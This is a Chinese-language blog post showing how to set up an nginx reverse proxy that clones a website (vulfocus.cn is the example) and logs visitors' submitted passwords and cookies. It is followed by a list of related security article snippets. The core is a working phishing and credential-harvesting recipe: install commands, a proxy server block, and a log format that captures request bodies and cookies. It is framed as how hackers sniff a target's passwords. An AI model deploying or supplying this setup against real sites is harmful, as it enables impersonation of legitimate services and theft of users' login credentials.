nginx反向代理-黑客如何嗅探目标HTTP密码?

最新推荐文章于 2024-09-15 13:59:12 发布
最新推荐文章于 2024-09-15 13:59:12 发布
阅读量175 收藏 2
点赞数 8
分类专栏: 内网渗透 文章标签: http 数据库 网络协议 网络安全 web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44187657/article/details/141256421
版权

nginx安装

Ubuntu安装命令:sudo apt-get install nginx -y

Centos安装命令:sudo yum install -y nginx

启动命令:

Ubuntu:service nginx start

Centos:systemctl start nginx.service

也可以用kali,自带nginx

原理

反向代理(reverse proxy)是指用代理服务器来接受外部的访问请求,然后将请求转发给内网的上游服务器,并将从上游服务器上得到的结果返回外部客户端。

如上所述,通过反向代理达到一个中间人的作用,也就可以获取用户和上游网站的通信流量,达到窃取认证凭证的目的。

利用方法

先查看一下本机IP,后面写配置文件用

先配置一下反向代理配置文件

vim /etc/nginx/sites-enabled/reverse-proxy.conf

然后将下面代码复制到配置文件内

server
{
listen 8081; # 监听端口
server_name 192.168.172.137; # 本机真实IP
location / {
proxy_pass https://vulfocus.cn/; # 反代的网站,即想要伪造的网站
proxy_set_header Host $host;
proxy_set_header X-Real-IP $remote_addr;
proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
 }
access_log /var/log/nginx/access_log_8081.log testLog; # 日志保存位置,testLog为自定义的日志格式
}

本文以伪造:https://vulfocus.cn/网站为例

编辑好后保存退出

然后再编辑nginx配置文件

vim /etc/nginx/nginx.conf

将下面两行代码写入

log_format testLog escape=json '$request_filename $http_x_forwarded_for $fastcgi_script_name $document_root $request_body' $http_cookie;
include /etc/nginx/sites-enabled/reverse-proxy.conf;

然后重启nginx

service nginx restart

然后去访问本机的IP

可以看到伪造出一个和源站一样的界面

然后去查看配置文件里配置的日志文件,就可以看到刚才输入的账号和密码

道一安全
关注
专栏目录
红队攻防渗透技术实战流程:红队目标信息收集之基础资产信息收集
HACKONE的博客
03-23 1053
在红队渗透测试中,客户的合作至关重要,他们会提供目标资产的基本信息作为初始攻击面。红队的行动范围通常是由客户明确授权界定的,这其中包括但不限于对主域名、下属子公司以及整个供应链体系中的相关资产进行安全测试。红队需严格按照约定的边界执行任务,可能涵盖但不限于对主域名下的各个子域名进行深度侦查,探究子公司间的网络互联情况,以及深入分析供应链各环节的软硬件设施、业务流程和数据交换点,以全方位评估和模拟真实攻击场景下的安全风险。在执行过程中,红队始终保持专业操守,确保所有行动均在合法、合规的前提下进行,并以增强客户
Nginx网站服务
xc0309的博客
06-03 1650
nginx访问控制,虚拟主机,LNMP
Nginx漏洞利用与安全加固
weixin_30631587的博客
07-16 1365
本文主要分为两大部分,第一部分介绍了Nginx的一些常见安全漏洞的形成原因、利用方法,并给出了相应的解决办法;第二部分介绍了Nginx安全加固时需要关注的主要内容。 Nginx(发音同engine x)是一款轻量级的Web服务器/反向代理服务器及电子邮件(IMAP/POP3)代理服务器,由俄罗斯的程序设计师Igor Sysoev所开发,可以稳定地运行在Linux、Windows等操作系统上,...
渗透测试 ( 3 ) --- Metasploit Framework ( MSF )
墨鱼菜鸡
07-11 4487
白嫖 Metasploit Pro 2022:https://zhuanlan.zhihu.com/p/449836479 白嫖 Metasploit Pro 2022:http://t.zoukankan.com/hxlinux-p-15787814.html 好东西之 metasploit pro:https://www.52pojie.cn/thr...
安全渗透测试解决方法以及使用nginx进行解决
qq_45621643的博客
12-07 2511
线上安全环境维护
nginx系列(一)----渗透的了解nginxnginx的基础知识)
Chen的博客
10-17 2498
前言: nginx一直是个热度高的词语,那么我们如何更加深切的了解nginx。 我们从网上百度出来的,只是对nginx有一个笼统的介绍,但我们不能更深刻的理解nginx的作用,今天,我们一起来学习nginx的用途。 首先,我们需要考虑的问题是,nginx用来做什么? 一、静态HTTP服务 首先,Nginx是一个HTTP服务器,可以将服务器上的静态文件(如HTML、图片)通过HTTP协议展现给客户端...
SQL 登录注入脚本_常见web安全问题,SQL注入、XSS、CSRF,基本原理以及如何防御...
weixin_39774491的博客
11-20 243
1.SQL注入原理:1).SQL命令可查询、插入、更新、删除等,命令的串接。而以分号字元为不同命 令的区别。(原本的作用是用于SubQuery或作为查询、插入、更新、删除……等 的条件式)2).SQL命令对于传入的字符串参数是用单引号字元所包起来。(但连续2个单引 号字元,在SQL资料库中,则视为字串中的一个单引号字元)3).SQL命令中,可以注入注解预防:1).在设计应用程序时,完全使用参数化查...
Nginx安全加固与防护策略
Nginx是一个高性能的HTTP反向代理服务器,也可以用作邮件代理服务器。它在现代网络架构中担当着重要的角色,能够提供高性能的静态内容处理、负载均衡、反向代理以及HTTP缓存等功能。 ## 1.2 为何需要对Nginx进行...
Web渗透测试-实战 方法 思路 总结
m0_55595611的博客
02-21 9440
尽可能的搜集目标的信息 端口信息 DNS信息 员工邮箱 信息搜集的分类 1、主动式信息搜集(可获取到的信息较多,但易被目标发现) 2、通过直接发起与被测目标网络之间的互动来获取相关信息,如通过Nmap扫描目标系统。 3、被动式信息搜集(搜集到的信息较少,但不易被发现) 4、通过第三方服务来获取目标网络相关信息。如通过搜索引擎方式来搜集信息。 搜索引擎 Google hacking 常用搜索语法: intitle:KEYWORD //搜索网页标题中含有关键词的网页 intext:KEYWORD //搜索站
04 渗透测试基础
热门推荐
weixin_43234021的博客
01-04 1万+
渗透测试基础一 代码审计1 基础环境搭建(1) Web服务:WAMP+phpstudy(2) phpstudy2 HTML 表单 一 代码审计 1 基础环境搭建 (1) Web服务:WAMP+phpstudy (2) phpstudy 启动问题 端口正常开放 80 http 3306 mysql web根目录[C:\Users\dq\Documents\phpStudy-1-24\phpStudy\WWW] php 探针 phpinfo.php phpmyadmin Apache配置文件:[
应用层协议HTTP介绍
最新发布
qhy850716的博客
09-15 956
状态码含义举例100Continue我接受了你的请求,请你继续。上传大文件时,服务器告诉客户端可以 继续上传200OK请求处理完成,过程一切正确201Created创建成功(文件,文章...)204No Content删除成功(文件,文章...)301网站换域名后,自动跳转到新域名;搜 索引擎更新网站链接时使用302Found用户登录成功后,重定向到用户首页304浏览器缓存机制,对未修改的资源返回 304 状态400填写表单时,格式不正确导致提交失败401。
安装 `privoxy` 将 Socks5 转换为 HTTP 代理
keyboard专栏
09-14 929
Socks5 代理可以通过curl测试正常工作。Docker直接使用 Socks5 代理是不可行的,因此通过privoxy将 Socks5 代理转换为 HTTP 代理,并让 Docker 使用 HTTP 代理是解决方案。
LINUX网络编程:http
W2155的博客
09-13 1086
1.认识http请求的字段2.HTTP请求类3.认识HTTP应答字段4.HTTP应答类5.源代码。
nginx】ngx_http_proxy_connect_module 正向代理
突围
09-14 392
nginx 正向代理
HTTP 的请求方式有哪些和有什么区别
qq_40914472的博客
09-12 1155
数据传输方式:GET 在 URL 中传递数据,POST、PUT、PATCH 在请求体中传递数据。安全性:GET 传递数据不安全,POST 适合传递敏感数据。幂等性:GET、PUT、DELETE 是幂等的,而 POST 和 PATCH 不是幂等的。操作目标:GET 用于获取资源,POST 用于创建或提交,PUT/PATCH 用于更新资源,DELETE 用于删除资源。
Haskell中的数据交换:通过http-conduit发送JSON请求
Z_suger7的博客
09-11 619
首先,我们需要定义一个Haskell数据类型,它将被用来表示我们要发送的JSON数据。
TCP与HTTP的关系
liiiiiiiiii123的博客
09-13 445
确保网页、图片、文件等资源能够准确无误地从服务器传输到客户端。应用层的协议通常需要借助传输层的协议来实现网络通信从而访问网页等资源。流量控制可以确保发送方不会发送过多的数据导致接收方无法处理;这是我面试遇到的问题,整理下来了,希望对大家有帮助!提供了可靠连接,当我们在请求网页的时候,需要先通过。拥塞控制则可以避免网络拥塞,保证数据的稳定传输。TCP 具有流量控制和拥塞控制机制,是传输控制协议,他在传输层。是超文本传输协议,在应用层。三次握手建立连接,这样就能。
HTTPHTTPS
weixin_47755728的博客
09-12 1064
HTTPHTTPS在差异方面,最显著的是安全性。HTTP是明文传输协议,而HTTPS是加密传输协议。这种加密特性使得HTTPS在传输敏感信息时更具优势。此外,浏览器地址展示方式也有所不同,HTTPS有绿色安全锁标志,而HTTP则有网站不安全标志提醒。在协议层面,HTTPS在HTTP的基础上加入了SSL安全认证证书,从而提供了更高级别的安全防护。在涉及敏感信息传输的场景中,如在线购物、银行业务等,基本都是用HTTPS协议进行数据传输。3. GET和POSE有什么区别。
理解Nginx反向代理与负载均衡配置
"本文介绍了nginx作为一款高性能的HTTP服务器和反向代理服务器的角色,以及其在负载均衡中的应用。重点讲述了反向代理的概念,通过对比正向代理来理解反向代理的工作原理,并举例说明了反向代理在实际场景中的应用,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值